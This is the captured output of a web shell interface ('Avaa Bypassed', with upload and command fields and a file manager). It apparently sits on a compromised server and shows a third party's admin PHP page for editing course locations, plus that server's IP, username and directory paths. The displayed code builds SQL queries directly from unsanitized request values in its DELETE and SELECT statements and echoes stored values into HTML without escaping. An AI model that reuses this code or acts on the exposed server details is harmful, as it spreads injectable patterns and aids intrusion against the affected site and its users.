[ Avaa Bypassed ]

Upload:

Command:

hmhc3928@3.149.234.94: ~ $ 
<?php
	$page_title = "Edit Location | CES Admin";
	include_once($_SERVER['DOCUMENT_ROOT'] . "/php/common_functions.php"); //common functions in the course registartion system
	include_once($_SERVER['DOCUMENT_ROOT'] . "/php/config.php"); //holds global config variables
 	require_once($_SERVER['DOCUMENT_ROOT'] . "/phplist/config/config.php"); //phplist config values  
 	check_if_authenticated('admin');//check if user is logged in
	

	if(isset($_POST['cancel']) || isset($_POST['back'])){ //form has been canceled
		header('location:index.php');
		exit;
	}//if

	include_once($_SERVER['DOCUMENT_ROOT'] . "/admin/php/top-admin.php"); //get the HTML heading common to all pages in the CES admin module
?>

 <article class="ces-admin">
        <h2>CES Admin - Edit Location</h2>

<?php
	include_once($_SERVER['DOCUMENT_ROOT'] . "/admin/php/nav-admin.php");
 	//opens connection to database

	$db = mysqli_connect($mysql_server, $user, $pass, $database);

	if(isset($_POST['delete'])){
		$delete_location_sql = "DELETE FROM ces_locations WHERE location_id = '$_POST[location_id]'";
		if (mysqli_query($db, $delete_location_sql)) {
			
			echo "<p class='alert alert-block alert-success'>The Location was deleted successfully</p>\n";
			echo "<form method='post' action='".$_SERVER['PHP_SELF']."''>";
			echo "<input type='submit' name='back' value='Back to Location List' class='btn btn-lg btn-block ces-green-btn'>";
			echo "</form>";
						
		}
	}

	if(isset($_POST['submit'])){ //form has been submitted, update database with new values
		//2013-04-30 - wsopko - sanitize input before update
		$location_name = check_input($_POST["location_name"]);
		$location_description = check_input($_POST["location_description"]);
		$address_line1 = check_input($_POST["address_line1"]);
		$address_line2 = check_input($_POST["address_line2"]);
		$city = check_input($_POST["city"]);
		$province = check_input($_POST["province"]);
		$postal_code = strtoupper(str_replace(" ","",check_input($_POST["postal_code"])));
		$seats = check_input($_POST["seats"]);		
		$location_id = check_input($_POST["location_id"]);
	
		$sql = "UPDATE ces_locations
		SET location_name=$location_name,
		location_description=$location_description,
		address_line1=$address_line1,
		address_line2=$address_line2,
		city=$city,
		province=$province,
		postal_code=$postal_code,
		seats=$seats
		WHERE location_id=$location_id";
		   
		if (mysqli_query($db, $sql)){ //updates the database
			//2013-04-30 - wsopko - log the event to event_log table
			log_event("edit_location", "updated location ID $location_id to values seats = $seats");
			echo "<p class='alert alert-success'>Record updated successfully</p>";
			echo "<form method='post' action='".$_SERVER['PHP_SELF']."''>";
			echo "<input type='submit' name='back' value='Back to Location List' class='btn btn-lg btn-block ces-green-btn'>";
			echo "</form>";
			//2016-03-04 - nwmosses - added a return value to updated capacity to show new registrations
			echo updated_capacity($location_id);

		}//if
		else{
			print_sql_error('Error - location update failed when doing:', $sql);
			echo "<form method='post' action='".$_SERVER['PHP_SELF']."''>";
			echo "<input type='submit' name='back' value='Back to Location List' class='btn btn-lg btn-block ces-green-btn'>";
			echo "</form>";
		}//else
	} //if	
	
	if(isset($_GET['location_id'])){ //we can identify the record, location_id is the primary key in the database, print out the record and allow updates
	
		$sql = mysqli_query($db, "SELECT location_id, location_name, location_description, address_line1, address_line2, city, province, postal_code, telehealth, seats FROM ces_locations WHERE location_id=$_GET[location_id]");
	
		echo "\n<form method='post' action='" . $_SERVER['PHP_SELF'] . "'>";

		echo "\n\t    <input type='hidden' name='location_id' value='".$_GET['location_id']."'>";
	
		while ($query = mysqli_fetch_array($sql)) { ?>

			<div class="form-group">
				<label for='location_name'>Location Name:</label>
				<input class="form-control" type='text' name='location_name' maxlength='50' value='<?php echo htmlspecialchars($query["location_name"], ENT_QUOTES) ?>'></td>
			</div>
			<div class="form-group">
				<label for='location_description'>Location Description:</label>
				<textarea class="form-control" style="height:auto; resize:none;" rows='5' name='location_description' wrap='soft'><?php echo $query["location_description"] ?></textarea>
			</div>
			<div class="form-group">	
				<label for="address_line1">Address Line 1:</label>
				<input class="form-control" type='text' name='address_line1' maxlength='75' value='<?php echo $query["address_line1"] ?>'>
			</div>
			<div class="form-group">	
				<label for="address_line2">Address Line 2:</label>
				<input class="form-control" type='text' name='address_line2' maxlength='75' value='<?php echo $query["address_line2"] ?>'>
			</div>
			<div class="form-group">	
				<label for="city">City:</label>
				<input class="form-control ces-form-half" type='text' name='city' maxlength='50' value='<?php echo $query["city"] ?>'>
			</div>
			<div class="form-group ces-form-one-quarter">
				<label for="province">Province:</label>	
				<?php provinces_select('province', $query["province"]); ?>
			</div>
			
			<div class="form-group ces-form-one-quarter">
				<label for="postal_code">Postal Code:</label>
				<input class="form-control" type='text' name='postal_code' maxlength='7' placeholder="A1B 2C3" pattern="[abceghjklmnprstvxyABCEGHJKLMNPRSTVXY][0-9][abceghjklmnprstvwxyzABCEGHJKLMNPRSTVWXYZ] ?[0-9][abceghjklmnprstvwxyzABCEGHJKLMNPRSTVWXYZ][0-9]" value='<?php echo $query["postal_code"] ?>'>
			</div>
			<div class="form-group ces-form-one-quarter">
				<label for="seats">Seats:</label>
				<input class="form-control" type='text' name='seats' maxlength='4' pattern="[0-9]{1,4}" title="Number of seats avalible." value='<?php echo $query["seats"] ?>'>
			</div>
			
			<input type='submit' name='submit' value="Update Location" class="btn btn-lg btn-block ces-green-btn">
			<a href="/admin/locations/" class="btn ces-orange-btn">Cancel</a>
			
			<?php
			
			$location_count = location_sessions($query['location_id']);
			if($location_count == 0){
				echo "\n<form  method='post' action='" . $_SERVER['PHP_SELF'] . "'>";
				echo '<input style="float:right;" class="btn btn-lg btn-block ces-grey-btn" type="submit" name="delete" value="Delete Unused Location" title="Delete Unused Location">';
				echo '<input type="hidden" name="location_id" value="'. $query['location_id'].'">';
				
			}

			?>

		</form>

		<?php
		} //while
	} //if
	
?>

 
  </article>
    


  </section><!-- #middle-->

</div><!-- #wrapper --> 
 
<?php require_once $_SERVER['DOCUMENT_ROOT'].'/require/footer.php';?>

Filemanager

DIR : / home/ hmhc3928/ public_html_community/ admin/ locations/
Name Type Size Permission Actions
add.php File 4.27 KB 0644
edit.php File 6.61 KB 0644
index.php File 2.69 KB 0644